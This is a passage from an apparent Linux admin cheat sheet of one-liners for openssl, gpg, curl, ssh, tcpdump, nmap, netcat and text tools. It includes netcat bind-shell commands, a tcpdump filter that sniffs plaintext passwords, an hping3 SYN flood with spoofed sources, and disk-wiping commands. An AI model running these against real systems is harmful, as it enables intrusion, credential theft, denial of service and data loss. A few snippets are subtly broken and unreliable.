${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key and csr ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \ openssl x509 -signkey ${_fd} -nodes \ -in ${_fd_csr} -req -days ${_days} -out ${_fd_out} ) ``` ###### Generate DH public parameters ```bash ( _dh_size="2048" ; \ openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" ) ``` ###### Display DH public parameters ```bash openssl pkeyparam -in dhparam.pem -text ``` ###### Extract private key from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} ) ``` ###### Extract private key and certs from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} ) ``` ###### Extract certs from p7b ```bash # PKCS#7 file doesn't include private keys. ( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \ openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem}) # or: openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem}) ``` ###### Convert DER to PEM ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} ) ``` ###### Convert PEM to DER ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} ) ``` ###### Verification of the private key ```bash ( _fd="private.key" ; \ openssl rsa -noout -text -in ${_fd} ) ``` ###### Verification of the public key ```bash # 1) ( _fd="public.key" ; \ openssl pkey -noout -text -pubin -in ${_fd} ) # 2) ( _fd="private.key" ; \ openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \ if [ $? = 0 ] ; then echo -en "OK\n" ; fi ) ``` ###### Verification of the certificate ```bash ( _fd="certificate.crt" ; # format: pem, cer, crt \ openssl x509 -noout -text -in ${_fd} ) ``` ###### Verification of the CSR ```bash ( _fd_csr="request.csr" ; \ openssl req -text -noout -in ${_fd_csr} ) ``` ###### Check the private key and the certificate are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq ``` ###### Check the private key and the CSR are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl req -noout -modulus -in request.csr | openssl md5) | uniq ``` ___ ##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk) ###### Secure delete with shred ```bash shred -vfuz -n 10 file shred --verbose --random-source=/dev/urandom -n 1 /dev/sda ``` ###### Secure delete with scrub ```bash scrub -p dod /dev/sda scrub -p dod -r file ``` ###### Secure delete with badblocks ```bash badblocks -s -w -t random -v /dev/sda badblocks -c 10240 -s -w -t random -v /dev/sda ``` ###### Secure delete with secure-delete ```bash srm -vz /tmp/file sfill -vz /local sdmem -v swapoff /dev/sda5 && sswap -vz /dev/sda5 ``` ___ ##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix)) ###### Show dd status every so often ```bash dd <dd_params> status=progress watch --interval 5 killall -USR1 dd ``` ###### Redirect output to a file with dd ```bash echo "string" | dd of=filename ``` ___ ##### Tool: [gpg](https://www.gnupg.org/) ###### Export public key ```bash gpg --export --armor "<username>" > username.pkey ``` * `--export` - export all keys from all keyrings or specific key * `-a|--armor` - create ASCII armored output ###### Encrypt file ```bash gpg -e -r "<username>" dump.sql ``` * `-e|--encrypt` - encrypt data * `-r|--recipient` - encrypt for specific <username> ###### Decrypt file ```bash gpg -o dump.sql -d dump.sql.gpg ``` * `-o|--output` - use as output file * `-d|--decrypt` - decrypt data (default) ###### Search recipient ```bash gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>" ``` * `--keyserver` - set specific key server * `--search-keys` - search for keys on a key server ###### List all of the packets in an encrypted file ```bash gpg --batch --list-packets archive.gpg gpg2 --batch --list-packets archive.gpg ``` ___ ##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other) ###### Reboot system from init ```bash exec /sbin/init 6 ``` ###### Init system from single user mode ```bash exec /sbin/init ``` ###### Show current working directory of a process ```bash readlink -f /proc/<PID>/cwd ``` ###### Show actual pathname of the executed command ```bash readlink -f /proc/<PID>/exe ``` ##### Tool: [curl](https://curl.haxx.se) ```bash curl -Iks https://www.google.com ``` * `-I` - show response headers only * `-k` - insecure connection when using ssl * `-s` - silent mode (not display body) ```bash curl -Iks --location -X GET -A "x-agent" https://www.google.com ``` * `--location` - follow redirects * `-X` - set method * `-A` - set user-agent ```bash curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com ``` * `--proxy [socks5://|http://]` - set proxy server ```bash curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf ``` * `-o` - write output to file * `-C` - resume the transfer ###### Find your external IP address (external services) ```bash curl ipinfo.io curl ipinfo.io/ip curl icanhazip.com curl ifconfig.me/ip ; echo ``` ###### Repeat URL request ```bash # URL sequence substitution with a dummy query string: curl -ks https://example.com/?[1-20] # With shell 'for' loop: for i in {1..20} ; do curl -ks https://example.com/ ; done ``` ###### Check DNS and HTTP trace with headers for specific domains ```bash ### Set domains and external dns servers. _domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1") for _domain in "${_domain_list[@]}" ; do printf '=%.0s' {1..48} echo printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain" for _dns in "${_dns_list[@]}" ; do # Resolve domain. host "${_domain}" "${_dns}" echo done for _proto in http https ; do printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain" # Get trace and http headers. curl -Iks -A "x-agent" --location "${_proto}://${_domain}" echo done done unset _domain_list _dns_list ``` ___ ##### Tool: [httpie](https://httpie.org/) ```bash http -p Hh https://www.google.com ``` * `-p` - print request and response headers * `H` - request headers * `B` - request body * `h` - response headers * `b` - response body ```bash http -p Hh https://www.google.com --follow --verify no ``` * `-F, --follow` - follow redirects * `--verify no` - skip SSL verification ```bash http -p Hh https://www.google.com --follow --verify no \ --proxy http:http://127.0.0.1:16379 ``` * `--proxy [http:]` - set proxy server ##### Tool: [ssh](https://www.openssh.com/) ###### Escape Sequence ``` # Supported escape sequences: ~. - terminate connection (and any multiplexed sessions) ~B - send a BREAK to the remote system ~C - open a command line ~R - Request rekey (SSH protocol 2 only) ~^Z - suspend ssh ~# - list forwarded connections ~& - background ssh (when waiting for connections to terminate) ~? - this message ~~ - send the escape character by typing it twice ``` ###### Compare a remote file with a local file ```bash ssh user@host cat /path/to/remotefile | diff /path/to/localfile - ``` ###### SSH connection through host in the middle ```bash ssh -t reachable_host ssh unreachable_host ``` ###### Run command over SSH on remote host ```bash cat > cmd.txt << __EOF__ cat /etc/hosts __EOF__ ssh host -l user $(<cmd.txt) ``` ###### Get public key from private key ```bash ssh-keygen -y -f ~/.ssh/id_rsa ``` ###### Get all fingerprints ```bash ssh-keygen -l -f .ssh/known_hosts ``` ###### SSH authentication with user password ```bash ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host ``` ###### SSH authentication with publickey ```bash ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host ``` ###### Simple recording SSH session ```bash function _ssh_sesslog() { _sesdir="<path/to/session/logs>" mkdir -p "${_sesdir}" && \ ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log" } # Alias: alias ssh='_ssh_sesslog' ``` ###### Using Keychain for SSH logins ```bash ### Delete all of ssh-agent's keys. function _scl() { /usr/bin/keychain --clear } ### Add key to keychain. function _scg() { /usr/bin/keychain /path/to/private-key source "$HOME/.keychain/$HOSTNAME-sh" } ``` ###### SSH login without processing any login scripts ```bash ssh -tt user@host bash ``` ###### SSH local port forwarding Example 1: ```bash # Forwarding our local 2250 port to nmap.org:443 from localhost through localhost host1> ssh -L 2250:nmap.org:443 localhost # Connect to the service: host1> curl -Iks --location -X GET https://localhost:2250 ``` Example 2: ```bash # Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y # Connect to the service: host1> psql -U db_user -d db_dev -p 9051 -h localhost ``` * `-n` - redirects stdin from `/dev/null` * `-N` - do not execute a remote command * `-T` - disable pseudo-terminal allocation ###### SSH remote port forwarding ```bash # Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y # Connect to the service: host2> psql -U postgres -d postgres -p 8000 -h localhost ``` ___ ##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html) ###### Testing remote connection to port ```bash timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $? ``` * `<proto` - set protocol (tcp/udp) * `<host>` - set remote host * `<port>` - set destination port ###### Read and write to TCP or UDP sockets with common bash tools ```bash exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&- ``` ___ ##### Tool: [tcpdump](http://www.tcpdump.org/) ###### Filter incoming (on interface) traffic (specific <ip:port>) ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 ``` * `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports) * `-e` - print the link-level headers * `-i [iface|any]` - set interface * `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions) * `host [ip|hostname]` - set host, also `[host not]` * `[and|or]` - set logic * `port [1-65535]` - set port number, also `[port not]` ###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap ``` * `-c [num]` - capture only num number of packets * `-w [filename]` - write packets to file, `-r [filename]` - reading from file ###### Capture all ICMP packets ```bash tcpdump -nei eth0 icmp ``` ###### Check protocol used (TCP or UDP) for service ```bash tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP" ``` ###### Display ASCII text (to parse the output using grep or other) ```bash tcpdump -i eth0 -A -s0 port 443 ``` ###### Grab everything between two keywords ```bash tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p' ``` ###### Grab user and pass ever plain http ```bash tcpdump -i eth0 port http -l -A | egrep -i \ 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \ --color=auto --line-buffered -B20 ``` ###### Extract HTTP User Agent from HTTP request header ```bash tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:" ``` ###### Capture only HTTP GET and POST packets ```bash tcpdump -ei eth0 -s 0 -A -vv \ 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' ``` or simply: ```bash tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:" ``` ###### Rotate capture files ```bash tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200 ``` * `-G <num>` - pcap will be created every `<num>` seconds * `-C <size>` - close the current pcap and open a new one if is larger than `<size>` ###### Top hosts by packets ```bash tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20 ``` ###### Excludes any RFC 1918 private address ```bash tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))' ``` ___ ##### Tool: [tcpick](http://tcpick.sourceforge.net/) ###### Analyse packets in real-time ```bash while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done ``` ___ ##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html) ```bash ngrep -d eth0 "www.domain.com" port 443 ``` * `-d [iface|any]` - set interface * `[domain]` - set hostname * `port [1-65535]` - set port number ```bash ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443 ``` * `(host [ip|hostname])` - filter by ip or hostname * `(port [1-65535])` - filter by port number ```bash ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443 ``` * `-q` - quiet mode (only payloads) * `-t` - added timestamps * `-O [filename]` - save output to file, `-I [filename]` - reading from file ```bash ngrep -d eth0 -qt 'HTTP' 'tcp' ``` * `HTTP` - show http headers * `tcp|udp` - set protocol * `[src|dst] host [ip|hostname]` - set direction for specific node ```bash ngrep -l -q -d eth0 -i "User-Agent: curl*" ``` * `-l` - stdout line buffered * `-i` - case-insensitive search ___ ##### Tool: [hping3](http://www.hping.org/) ```bash hping3 -V -p 80 -s 5050 <scan_type> www.google.com ``` * `-V|--verbose` - verbose mode * `-p|--destport` - set destination port * `-s|--baseport` - set source port * `<scan_type>` - set scan type * `-F|--fin` - set FIN flag, port open if no reply * `-S|--syn` - set SYN flag * `-P|--push` - set PUSH flag * `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open) * `-U|--urg` - set URG flag * `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply * `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply ```bash hping3 -V -c 1 -1 -C 8 www.google.com ``` * `-c [num]` - packet count * `-1` - set ICMP mode * `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8) ```bash hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host> ``` * `--flood` - sent packets as fast as possible (don't show replies) * `--rand-source` - random source address mode * `-d --data` - data size * `-w|--win` - winsize (default 64) ___ ##### Tool: [nmap](https://nmap.org/) ###### Ping scans the network ```bash nmap -sP 192.168.0.0/24 ``` ###### Show only open ports ```bash nmap -F --open 192.168.0.0/24 ``` ###### Full TCP port scan using with service version detection ```bash nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24 ``` ###### Nmap scan and pass output to Nikto ```bash nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h - ``` ###### Recon specific ip:service with Nmap NSE scripts stack ```bash # Set variables: _hosts="192.168.250.10" _ports="80,443" # Set Nmap NSE scripts stack: _nmap_nse_scripts="+dns-brute,\ +http-auth-finder,\ +http-chrono,\ +http-cookie-flags,\ +http-cors,\ +http-cross-domain-policy,\ +http-csrf,\ +http-dombased-xss,\ +http-enum,\ +http-errors,\ +http-git,\ +http-grep,\ +http-internal-ip-disclosure,\ +http-jsonp-detection,\ +http-malware-host,\ +http-methods,\ +http-passwd,\ +http-phpself-xss,\ +http-php-version,\ +http-robots.txt,\ +http-sitemap-generator,\ +http-shellshock,\ +http-stored-xss,\ +http-title,\ +http-unsafe-output-escaping,\ +http-useragent-tester,\ +http-vhosts,\ +http-waf-detect,\ +http-waf-fingerprint,\ +http-xssed,\ +traceroute-geolocation.nse,\ +ssl-enum-ciphers,\ +whois-domain,\ +whois-ip" # Set Nmap NSE script params: _nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true," _nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges," _nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1" # Perform scan: nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts" ``` ___ ##### Tool: [netcat](http://netcat.sourceforge.net/) ```bash nc -kl 5000 ``` * `-l` - listen for an incoming connection * `-k` - listening after client has disconnected * `>filename.out` - save receive data to file (optional) ```bash nc 192.168.0.1 5051 < filename.in ``` * `< filename.in` - send data to remote host ```bash nc -vz 10.240.30.3 5000 ``` * `-v` - verbose output * `-z` - scan for listening daemons ```bash nc -vzu 10.240.30.3 1-65535 ``` * `-u` - scan only udp ports ###### Transfer data file (archive) ```bash server> nc -l 5000 | tar xzvfp - client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000 ``` ###### Launch remote shell ```bash # 1) server> nc -l 5000 -e /bin/bash client> nc 10.240.30.3 5000 # 2) server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000 ``` ###### Simple file server ```bash while true ; do nc -l 5000 | tar -xvf - ; done ``` ###### Simple minimal HTTP Server ```bash while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done ``` ###### Simple HTTP Server > Restarts web server after each request - remove `while` condition for only single connection. ```bash cat > index.html << __EOF__ <!doctype html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <p> Hello! It's a site. </p> </body> </html> __EOF__ ``` ```bash server> while : ; do \ (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \ nc -l -p 5000 \ ; done ``` * `-p` - port number ###### Simple HTTP Proxy (single connection) ```bash #!/usr/bin/env bash if [[ $# != 2 ]] ; then printf "%s\\n" \ "usage: ./nc-proxy listen-port bk_host:bk_port" fi _listen_port="$1" _bk_host=$(echo "$2" | cut -d ":" -f1) _bk_port=$(echo "$2" | cut -d ":" -f2) printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \ "$_listen_port" "$_bk_host" "$_bk_port" _tmp=$(mktemp -d) _back="$_tmp/pipe.back" _sent="$_tmp/pipe.sent" _recv="$_tmp/pipe.recv" trap 'rm -rf "$_tmp"' EXIT mkfifo -m 0600 "$_back" "$_sent" "$_recv" sed "s/^/=> /" <"$_sent" & sed "s/^/<= /" <"$_recv" & nc -l -p "$_listen_port" <"$_back" | \ tee "$_sent" | \ nc "$_bk_host" "$_bk_port" | \ tee "$_recv" >"$_back" ``` ```bash server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000 lport: 8080 bk_host: 192.168.252.10 bk_port: 8000 client> http -p h 10.240.30.3:8080 HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=31536000 Content-Length: 2748 Content-Type: text/html; charset=utf-8 Date: Sun, 01 Jul 2018 20:12:08 GMT Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT ``` ###### Create a single-use TCP or UDP proxy ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` ___ ##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html) ###### Testing connection to remote host (with SNI support) ```bash gnutls-cli -p 443 google.com ``` ###### Testing connection to remote host (without SNI support) ```bash gnutls-cli --disable-sni -p 443 google.com ``` ___ ##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html) ###### Testing remote connection to port ```bash socat - TCP4:10.240.30.3:22 ``` * `-` - standard input (STDIO) * `TCP4:<params>` - set tcp4 connection with specific params * `[hostname|ip]` - set hostname/ip * `[1-65535]` - set port number ###### Redirecting TCP-traffic to a UNIX domain socket under Linux ```bash socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo ``` * `TCP-LISTEN:<params>` - set tcp listen with specific params * `[1-65535]` - set port number * `bind=[hostname|ip]` - set bind hostname/ip * `reuseaddr` - allows other sockets to bind to an address * `fork` - keeps the parent process attempting to produce more connections * `su=nobody` - set user * `range=[ip-range]` - ip range * `UNIX-CLIENT:<params>` - communicates with the specified peer socket * `filename` - define socket ___ ##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/) ###### Set iface in promiscuous mode and dump traffic to the log file ```bash p0f -i enp0s25 -p -d -o /dump/enp0s25.log ``` * `-i` - listen on the specified interface * `-p` - set interface in promiscuous mode * `-d` - fork into background * `-o` - output file ___ ##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat) ###### Graph # of connections for each hosts ```bash netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \ sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }' ``` ###### Monitor open connections for specific port including listen, count and sort it per IP ```bash watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1" ``` ###### Grab banners from local IPv4 listening ports ```bash netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}" ``` ___ ##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync) ###### Rsync remote data as root using sudo ```bash rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/ ``` ___ ##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix)) ###### Resolves the domain name (using external dns server) ```bash host google.com 9.9.9.9 ``` ###### Checks the domain administrator (SOA record) ```bash host -t soa google.com 9.9.9.9 ``` ___ ##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command)) ###### Resolves the domain name (short output) ```bash dig google.com +short ``` ###### Lookup NS record for specific domain ```bash dig @9.9.9.9 google.com NS ``` ###### Query only answer section ```bash dig google.com +nocomments +noquestion +noauthority +noadditional +nostats ``` ###### Query ALL DNS Records ```bash dig google.com ANY +noall +answer ``` ###### DNS Reverse Look-up ```bash dig -x 172.217.16.14 +short ``` ___ ##### Tool: [certbot](https://certbot.eff.org/) ###### Generate multidomain certificate ```bash certbot certonly -d example.com -d www.example.com ``` ###### Generate wildcard certificate ```bash certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com ``` ###### Generate certificate with 4096 bit private key ```bash certbot certonly -d example.com -d www.example.com --rsa-key-size 4096 ``` ___ ##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other) ###### Get all subnets for specific AS (Autonomous system) ```bash AS="AS32934" whois -h whois.radb.net -- "-i origin ${AS}" | \ grep "^route:" | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]//' | \ sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]/allow /' | \ sed 's/$/;/' | \ sed 's/allow */subnet -> /g' ``` ###### Resolves domain name from dns.google.com with curl and jq ```bash _dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq . ``` ##### Tool: [git](https://git-scm.com/) ###### Log alias for a decent view of your repo ```bash # 1) git log --oneline --decorate --graph --all # 2) git log --graph \ --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \ --abbrev-commit ``` ___ ##### Tool: [python](https://www.python.org/) ###### Static HTTP web server ```bash # Python 3.x python3 -m http.server 8000 --bind 127.0.0.1 # Python 2.x python -m SimpleHTTPServer 8000 ``` ###### Static HTTP web server with SSL support ```bash # Python 3.x from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/to/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() # Python 2.x import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/tp/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() ``` ###### Encode base64 ```bash python -m base64 -e <<< "sample string" ``` ###### Decode base64 ```bash python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg==" ``` ##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html) ###### Search for matching lines ```bash # egrep foo awk '/foo/' filename ``` ###### Search non matching lines ```bash # egrep -v foo awk '!/foo/' filename ``` ###### Print matching lines with numbers ```bash # egrep -n foo awk '/foo/{print FNR,$0}' filename ``` ###### Print the last column ```bash awk '{print $NF}' filename ``` ###### Find all the lines longer than 80 characters ```bash awk 'length($0)>80{print FNR,$0}' filename ``` ###### Print only lines of less than 80 characters ```bash awk 'length < 80 filename ``` ###### Print double new lines a file ```bash awk '1; { print "" }' filename ``` ###### Print line numbers ```bash awk '{ print FNR "\t" $0 }' filename awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner ``` ###### Print line numbers for only non-blank lines ```bash awk 'NF { $0=++a " :" $0 }; { print }' filename ``` ###### Print the line and the next two (i=5) lines after the line matching regexp ```bash awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename ``` ###### Print the lines starting at the line matching 'server {' until the line matching '}' ```bash awk '/server {/,/}/' filename ``` ###### Print multiple columns with separators ```bash awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename ``` ###### Remove empty lines ```bash awk 'NF > 0' filename # alternative: awk NF filename ``` ###### Delete trailing white space (spaces, tabs) ```bash awk '{sub(/[ \t]*$/, "");print}' filename ``` ###### Delete leading white space ```bash awk '{sub(/^[ \t]+/, ""); print}' filename ``` ###### Remove duplicate consecutive lines ```bash # uniq awk 'a !~ $0{print}; {a=$0}' filename ``` ###### Remove duplicate entries in a file without sorting ```bash awk '!x[$0]++' filename ``` ###### Exclude multiple columns ```bash awk '{$1=$3=""}1' filename ``` ###### Substitute foo for bar on lines matching regexp ```bash awk '/regexp/{gsub(/foo/, "bar")};{print}' filename ``` ###### Add some characters at the beginning of matching lines ```bash awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename ``` ###### Get the last hour of Apache logs ```bash awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \ /var/log/httpd/access_log ``` ___ ##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html) ###### Print a specific line from a file ```bash sed -n 10p /path/to/file ``` ###### Remove a specific line from a file ```bash sed -i 10d /path/to/file # alternative (BSD): sed -i'' 10d /path/to/file ``` ###### Remove a range of lines from a file ```bash sed -i <file> -re '<start>,<end>d' ``` ###### Replace newline(s) with a space ```bash sed ':a;N;$!ba;s/\n/ /g' /path/to/file # cross-platform compatible syntax: sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file ``` - `:a` create a label `a` - `N` append the next line to the pattern space - `$!` if not the last line, ba branch (go to) label `a` - `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can) Alternatives: ```bash # perl version (sed-like speed): perl -p -e 's/\n/ /' /path/to/file # bash version (slow): while read line ; do printf "%s" "$line " ; done < file ``` ###### Delete string +N next lines ```bash sed '/start/,+4d' /path/to/file ``` ___ ##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html) ###### Search for a "pattern" inside all files in the current directory ```bash grep -rn "pattern" grep -RnisI "pattern" * fgrep "pattern" * -R ``` ###### Show only for multiple patterns ```bash grep 'INFO*'\''WARN' filename grep 'INFO\|WARN' filename grep -e INFO -e WARN filename grep -E '(INFO|WARN)' filename egrep "INFO|WARN" filename ``` ###### Except multiple patterns ```bash grep -vE '(error|critical|warning)' filename ``` ###### Show data from file without comments ```bash grep -v ^[[:space:]]*# filename ``` ###### Show data from file without comments and new lines ```bash egrep -v '#|^$' filename ``` ###### Show strings with a dash/hyphen ```bash grep -e -- filename grep -- -- filename grep "\-\-" filename ``` ###### Remove blank lines from a file and save output to new file ```bash grep . filename > newfilename ``` ##### Tool: [perl](https://www.perl.org/) ###### Search and replace (in place) ```bash perl -i -pe's/SEARCH/REPLACE/' filename ``` ###### Edit of `*.conf` files changing all foo to bar (and backup original) ```bash perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf ``` ###### Prints the first 20 lines from `*.conf` files ```bash perl -pe 'exit if $. > 20' *.conf ``` ###### Search lines 10 to 20 ```bash perl -ne 'print if 10 .. 20' filename ``` ###### Delete first 10 lines (and backup original) ```bash perl -i.orig -ne 'print unless 1 .. 10' filename ``` ###### Delete all but lines between foo and bar (and backup original) ```bash perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename ``` ###### Reduce multiple blank lines to a single line ```bash perl -p -i -00pe0 filename ``` ###### Convert tabs to spaces (1t = 2sp) ```bash perl -p -i -e 's/\t/ /g' filename ``` ###### Read input from a file and report number of lines and characters ```bash perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename ``` #### Shell functions &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents - [Domain resolve](#domain-resolve) - [Get ASN](#get-asn) ###### Domain resolve ```bash # Dependencies: # - curl # - jq function DomainResolve() { local _host="$1" local _curl_base="curl --request GET" local _timeout="15" _host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \ jq '.Answer[0].data' | tr -d "\"" 2>/dev/null) if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then echo -en "Unsuccessful domain name resolution.\\n" else echo -en "$_host > $_host_ip\\n" fi } ``` Example: ```bash shell> DomainResolve nmap.org nmap.org > 45.33.49.119 shell> DomainResolve nmap.org Unsuccessful domain name resolution. ``` ###### Get ASN ```bash # Dependencies: # - curl function GetASN() { local _ip="$1" local _curl_base="curl --request GET" local _timeout="15" _asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as") _state=$(echo $?) if [[ -z "$_ip" ]] || [[ 